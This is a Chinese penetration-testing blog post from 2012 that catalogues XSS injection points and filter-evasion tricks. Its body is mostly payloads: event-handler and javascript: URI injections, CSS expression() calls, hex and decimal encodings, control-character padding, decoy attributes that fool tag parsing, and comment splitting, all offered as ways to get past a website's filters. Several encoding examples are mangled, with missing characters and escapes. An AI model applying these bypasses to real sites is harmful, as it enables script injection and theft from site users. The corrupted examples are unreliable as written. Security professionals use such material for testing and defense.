您的位置 » 首页 » 渗透测试 » XSS跨站:xss插入代码和绕过过滤

XSS跨站:xss插入代码和绕过过滤

发表于4年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2012年11月25日 | 文章热度:5,782 次 全屏阅读

显示不全请点击全屏阅读

代码插入方式

  由于插入的脚本为js或者是vbs,所有一般需要由的关键字JavaScript、VbScript、expression比 如<IMG SRC=”JavaScript:alert(’XSS’);”>,但当接收鼠标或键盘响应时,这三个关键字可以省略掉,所以有以下利用方法<img onmouseover=”alert(‘XSS’)”>或者<INPUT onkeyup=”alert(‘XSS’);”>等等。而且由于html并 不遵循xhtml的标准,所以可以有以下插入方式:

1、标签属性可以用双引号、可以用单引号、也可以可不用引号;

2、属性值可以大写;可以小写;也可以混合写;

3、可以插入回车、包括段末结尾符和换行符的两种、即char(10)和char(13)、tab空格;

<img src=”jav as cript:al ert(‘test’);”>

4、如果是style形式还可以插入反斜线“”、注释符“/**/”;

<style>@import:’javascript:alert(“test”);'</style>

5、可以将插入的代码转换成10进制、16进制;

例1,

<DIV STYLE=”background-image:07507206C02806A06107606107306307206907007403A06106C065072074028027058053053027029029″>

上面代码等同于:

<DIV STYLE=”background-image:url(javascript:alert(‘XSS’))”>

例2,

<IMG SRC=java

scri

pt:al

ert(‘

xss’);>

上面代码等同于

<IMG SRC=”javascript:alert(‘xss’);”>

6、由于禁止的不确定性,你插入的进制串可以进行一系列转化并可以随意搭配组合;

7、进字符“j”就可以有以下15种编码方法,而且还是不计字符的大小写。

6A6A06A006A0006A //java形式的16进制编码

jjjjj //十 进制编码

jjjjj //十 六进制编码

8、其他的编码方式,如htmlEncode和URLEncode对于html及URL的编码。

  至于可以插入代码的html标签嘛……说句近乎疯狂的话——目前几乎所有可以插入属性的标签都 可以插入代码,比如<bstyle=”xss:expression(alert(‘XSS’))”>。

  在html标签中可以插入代码的属性一般为:src、style、dynsrc(常用于img和input中,用此属 性还可以插入视频等)、lowsrc(预载缩略图)、鼠标属性(如o n m o u s e o v e r )、键盘属性( 如onkeypress)、href属性(常用于a和link)、boby的onload属性、URL属性等。

  过滤绕过方式

  当然人家网站也不可能傻乎乎地让你输入这些代码,所以它们一般会对你输入的字符进行过滤。 所以我们编写好的代码并一定就能顺利的插入执行,很有可能某些关键的字符被过滤掉了,比 如”JavaScript”。如果只是这种单纯的过滤,那么绕过方法实在太简单,只要每当输入此字符时输 入”javajavascriptscript”之类就可以了。当然网站程序员依然不会这样傻,它们会进行种种过滤来防备 你,所以结合上面的”代码插入方式”,你可能会总结出以下的绕过网站过滤系统的方法:

  1、用控制字符的ASCII码填充

  比如<IMG SRC=”;JavaScript:alert(‘XSS’);”>,如果你熟悉ASCII码,你应该 知道系统控制字符一共是33个,这里去掉一个头&#00(null)和一个尾(del),其他31个字符 均可以顺利插入代码头部,对过滤系统进行混淆,并且不影响原代码执行,而且你依然可以用”代码插入 方式”中的”方案7″进行编码的任意转换。七种tab符 、换行符、回车符可以插到代码任何地方。

  2、插入混淆属性

  当我们进行一般的文字录入时会发现,并不是所有带”JavaSceipt”这样的字符都会被过滤掉。而是只有在html标签内的特殊字符会被滤掉,这使得我们有了令一套绕过措施,在插入代码的属性前面插 入另一混淆属性,并在该属性中插入让过滤系统误以为是标签结束符的字符,从而让过滤系统认为执行代码在html标签的外面。比如:

<img src=”abc>” onmouseover=”[code]”> //插入混淆的src属 性

<IMG “””><SCRIPT>[code]</SCRIPT>”> //插入混 淆的双引号及 “>”符号

<SCRIPT a=”>” SRC=”xss.js”></SCRIPT> //插入混淆的a 属性

  3、用注释符分割

  由于浏览器会忽略掉每种代码的注释符,因此如果我们在代码中的注释符就可以成功地欺骗过滤 系统并且不影响XSS代码的正常运行。比如:

<img style=”xss:expr/*XSS*/ession([code])”> //css的注释符号 为/**/,其中的内容会被忽略

<style>@import’javascript:alert(“XSS”)’;</style> //css中忽略的符号还有“”

exp/*<A STYLE=’noxss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression (alert(“XSS”))’> //注释混淆后的样子

<style><!–</style><script>[code]//– ></script> //html的注释符为<!–注释–>

Tags:

XSS,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1749/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)